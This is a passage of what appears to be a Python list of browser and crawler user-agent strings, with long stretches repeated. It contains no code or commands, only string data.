'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
